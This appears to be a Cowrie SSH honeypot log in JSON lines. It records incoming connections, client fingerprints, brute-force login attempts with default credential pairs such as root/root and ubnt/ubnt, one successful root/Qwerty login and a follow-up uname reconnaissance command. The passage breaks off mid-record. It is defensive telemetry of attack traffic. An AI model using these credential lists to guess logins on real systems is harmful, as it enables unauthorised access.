{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:33:41.612287Z","src_ip":"212.227.125.160","session":"360ff878f715"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:33:45.030794Z","src_ip":"212.227.125.160","session":"360ff878f715"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48998,"dst_ip":"1.2.3.4","dst_port":22,"session":"0db3e25e5a15","protocol":"ssh","message":"New connection: 212.227.125.160:48998 (1.2.3.4:22) [session: 0db3e25e5a15]","sensor":"my-vps","timestamp":"2025-08-28T00:33:45.120407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:33:45.121207Z","src_ip":"212.227.125.160","session":"0db3e25e5a15"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:33:45.179908Z","src_ip":"212.227.125.160","session":"0db3e25e5a15"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T00:33:45.427540Z","src_ip":"212.227.125.160","session":"0db3e25e5a15"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:33:46.489294Z","src_ip":"212.227.125.160","session":"0db3e25e5a15"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-28T00:33:47.561955Z","src_ip":"212.227.125.160","session":"360ff878f715"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:33:50.586378Z","src_ip":"212.227.125.160","session":"360ff878f715"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T00:34:03.724757Z","src_ip":"171.243.151.203","session":"a9d1315a403e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54770,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bd8c86262f3","protocol":"ssh","message":"New connection: 194.233.79.134:54770 (1.2.3.4:22) [session: 8bd8c86262f3]","sensor":"my-vps","timestamp":"2025-08-28T00:34:08.002742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:34:08.797222Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:34:08.797887Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.session.closed","duration":"32.6","message":"Connection lost after 32.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:34:09.589375Z","src_ip":"171.243.151.203","session":"a9d1315a403e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:34:10.146004Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T00:34:10.625983Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T00:34:10.626712Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:34:10.833008Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:34:10.834122Z","src_ip":"194.233.79.134","session":"8bd8c86262f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42562,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e7fd99331bc","protocol":"ssh","message":"New connection: 212.227.235.229:42562 (1.2.3.4:22) [session: 9e7fd99331bc]","sensor":"my-vps","timestamp":"2025-08-28T00:34:36.469746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:34:36.470704Z","src_ip":"212.227.235.229","session":"9e7fd99331bc"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:34:36.577813Z","src_ip":"212.227.235.229","session":"9e7fd99331bc"}
{"eventid":"cowrie.login.failed","username":"Administrator","password":"Admin","message":"login attempt [Administrator/Admin] failed","sensor":"my-vps","timestamp":"2025-08-28T00:34:36.901636Z","src_ip":"212.227.235.229","session":"9e7fd99331bc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:34:38.011826Z","src_ip":"212.227.235.229","session":"9e7fd99331bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46124,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dfad30d0fa8","protocol":"ssh","message":"New connection: 212.227.125.160:46124 (1.2.3.4:22) [session: 0dfad30d0fa8]","sensor":"my-vps","timestamp":"2025-08-28T00:34:58.524926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:34:58.526023Z","src_ip":"212.227.125.160","session":"0dfad30d0fa8"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:34:59.559338Z","src_ip":"212.227.125.160","session":"0dfad30d0fa8"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:07.131070Z","src_ip":"212.227.125.160","session":"0dfad30d0fa8"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:35:08.381677Z","src_ip":"212.227.125.160","session":"0dfad30d0fa8"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":64820,"dst_ip":"1.2.3.4","dst_port":22,"session":"70ac045e176a","protocol":"ssh","message":"New connection: 80.94.95.15:64820 (1.2.3.4:22) [session: 70ac045e176a]","sensor":"my-vps","timestamp":"2025-08-28T00:35:17.382018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:35:17.382698Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:35:17.460537Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.login.failed","username":"user","password":"Exigent","message":"login attempt [user/Exigent] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:17.819017Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.login.failed","username":"user","password":"clancy","message":"login attempt [user/clancy] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:18.914427Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.login.failed","username":"user","password":"chelsea1","message":"login attempt [user/chelsea1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:19.985019Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.login.failed","username":"user","password":"353535","message":"login attempt [user/353535] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:21.066647Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.login.failed","username":"user","password":"282828","message":"login attempt [user/282828] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:22.163200Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:35:23.264450Z","src_ip":"80.94.95.15","session":"70ac045e176a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":34336,"dst_ip":"1.2.3.4","dst_port":22,"session":"2838cf0b56f3","protocol":"ssh","message":"New connection: 194.233.79.134:34336 (1.2.3.4:22) [session: 2838cf0b56f3]","sensor":"my-vps","timestamp":"2025-08-28T00:35:26.527699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:35:26.528736Z","src_ip":"194.233.79.134","session":"2838cf0b56f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:35:27.102710Z","src_ip":"194.233.79.134","session":"2838cf0b56f3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:35:30.011824Z","src_ip":"194.233.79.134","session":"2838cf0b56f3"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:35:31.240407Z","src_ip":"194.233.79.134","session":"2838cf0b56f3"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":49780,"dst_ip":"1.2.3.4","dst_port":22,"session":"66f198822cc5","protocol":"ssh","message":"New connection: 171.243.150.245:49780 (1.2.3.4:22) [session: 66f198822cc5]","sensor":"my-vps","timestamp":"2025-08-28T00:35:37.376130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:35:37.377126Z","src_ip":"171.243.150.245","session":"66f198822cc5"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac